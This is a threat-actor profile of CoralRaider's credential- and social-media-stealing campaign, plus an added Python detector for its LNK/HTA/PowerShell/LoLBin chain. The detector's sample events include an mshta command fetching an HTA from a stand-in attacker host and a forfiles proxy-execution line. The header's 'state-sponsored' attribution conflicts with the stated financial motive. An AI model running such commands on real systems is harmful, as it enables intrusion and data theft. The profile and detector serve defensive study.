CoralRaider – Threat Actor

April 10, 2024
Reading Time: 8 mins read
in Threat Actors
CoralRaider

Other Names

Unknown

Location

Vietnam

Date of initial activity

2023

Suspected attribution

State-sponsored threat group

Associated Groups

Unknown

Motivation

Data theft and hijacking social media accounts for financial gains

Associated tools

CoralRaider employs a variety of customized commodity malware families such as RotBot (QuasarRAT), XClient stealer, NetSupport RAT, AsyncRAT and Rhadamanthys.

Active

Yes

Overview

Cisco Talos recently uncovered a new threat actor known as “CoralRaider,” suspected to originate from Vietnam and motivated by financial gain. Operating since at least 2023, CoralRaider has targeted victims across various Asian and Southeast Asian countries. Their primary objective is to steal credentials, financial data, and social media accounts, including those associated with business and advertising.

In their campaigns, CoralRaider utilizes advanced tools such as RotBot, a customized variant of QuasarRAT, and the XClient stealer. Notably, they employ the dead drop technique, utilizing a legitimate service to host the command-and-control (C2) configuration file. Additionally, CoralRaider incorporates uncommon living-off-the-land binaries (LoLBins) like Windows Forfiles.exe and FoDHelper.exe into their operations, highlighting the group’s sophisticated and evolving cyber strategies.

Common targets

India, China, South Korea, Bangladesh, Pakistan, Indonesia, Vietnam.

Attack Vectors

The initial vector of the campaign is a Windows shortcut (LNK) file. Researchers have not determined how the actor delivered the LNK files to victims.

How they operate

The attack begins when a user opens a malicious Windows shortcut file, which downloads and executes an HTML application (HTA) file from an attacker-controlled server. The HTA file contains an embedded, obfuscated Visual Basic script, which runs and in turn executes an embedded PowerShell script in memory. After decryption, this PowerShell script sequentially runs three further PowerShell scripts. These scripts perform anti-VM and anti-analysis checks, bypass User Account Control (UAC), disable notifications from Windows and from applications on the victim’s machine, and finally download and execute RotBot.

On first execution, RotBot, a variant of the QuasarRAT client, performs evasion checks to avoid detection and carries out system reconnaissance. It then connects to a host on a legitimate domain, likely controlled by the threat actor, to retrieve the configuration file it needs to reach the command-and-control (C2) server. In this campaign, CoralRaider uses a Telegram bot as the C2 channel.

Once connected to the Telegram C2, RotBot loads the XClient stealer payload into memory from its resources and executes its plugin program. The XClient stealer plugin runs additional anti-VM and anti-virus checks on the victim’s system, then gathers browser data such as cookies, stored credentials, and financial details including credit card information. It also harvests data from social media platforms (Facebook, Instagram, TikTok business ads, and YouTube) and application data from the Telegram desktop and Discord clients on the victim’s machine. Screenshots of the victim’s desktop are captured and saved as PNG files in the machine’s temporary folder.

Finally, the stealer plugin compiles the collected browser and social media data into a text file, packs it into a ZIP archive, and exfiltrates both the PNG and ZIP files to the attacker’s Telegram bot C2.
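The process chain above (LNK, then mshta.exe fetching the HTA, then PowerShell, then the Forfiles.exe and FoDHelper.exe LoLBins) lends itself to simple process-creation heuristics. The following is an added example, not code from the original page or from Cisco Talos: the rule names, the sample events and the placeholder host name are all constructed for illustration.

```python
# Added example: heuristic detector for the LNK -> HTA -> PowerShell -> LoLBin
# chain described above, run over constructed events. Rule names are mine,
# not Cisco Talos detections.
from dataclasses import dataclass
from typing import List, Tuple

@dataclass
class ProcEvent:
    parent: str   # parent process image path
    image: str    # new process image path
    cmdline: str  # command line of the new process

def _base(path: str) -> str:
    """Lower-case file name of an image path (either slash style)."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def classify(ev: ProcEvent) -> List[str]:
    """Return the rule names an event matches (empty list = no hit)."""
    parent, image, cmd = _base(ev.parent), _base(ev.image), ev.cmdline.lower()
    hits = []
    # HTA stage: mshta.exe fetching an HTA from a remote server.
    if image == "mshta.exe" and ("http://" in cmd or "https://" in cmd):
        hits.append("remote_hta")
    # VBScript inside the HTA launching the in-memory PowerShell stage.
    if image == "powershell.exe" and parent == "mshta.exe":
        hits.append("mshta_to_powershell")
    # Uncommon LoLBin: forfiles.exe proxying execution of another command (/c).
    # Admin scripts use /c legitimately, so scope this by parent in production.
    if image == "forfiles.exe" and "/c" in cmd:
        hits.append("forfiles_proxy_exec")
    # Uncommon LoLBin: fodhelper.exe normally spawns no child processes.
    if parent == "fodhelper.exe":
        hits.append("fodhelper_child")
    return hits

def scan(events: List[ProcEvent]) -> List[Tuple[str, List[str]]]:
    """(image name, matched rules) for every event that hits at least one rule."""
    return [(_base(e.image), classify(e)) for e in events if classify(e)]

# Constructed sample telemetry (not real logs); the host name is a placeholder.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              'mshta.exe "http://attacker.example/stage.hta"'),
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -NonInteractive"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\forfiles.exe",
              'forfiles.exe /p C:\\Temp /m *.log /c "cmd /c echo @file"'),
    ProcEvent(r"C:\Windows\System32\fodhelper.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]
```

Running `scan(SAMPLE_EVENTS)` flags the first four events and leaves the notepad.exe launch alone; in real telemetry, correlate the hits by host and time window rather than alerting on each rule in isolation.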

Significant Attacks

CoralRaider is of Vietnamese origin and financially motivated. The group has been operating since at least 2023, targeting victims in several Asian and Southeast Asian countries. (April 2024)

References:
  • CoralRaider targets victims’ data and social media accounts.
  • CoralRaider targets social media accounts.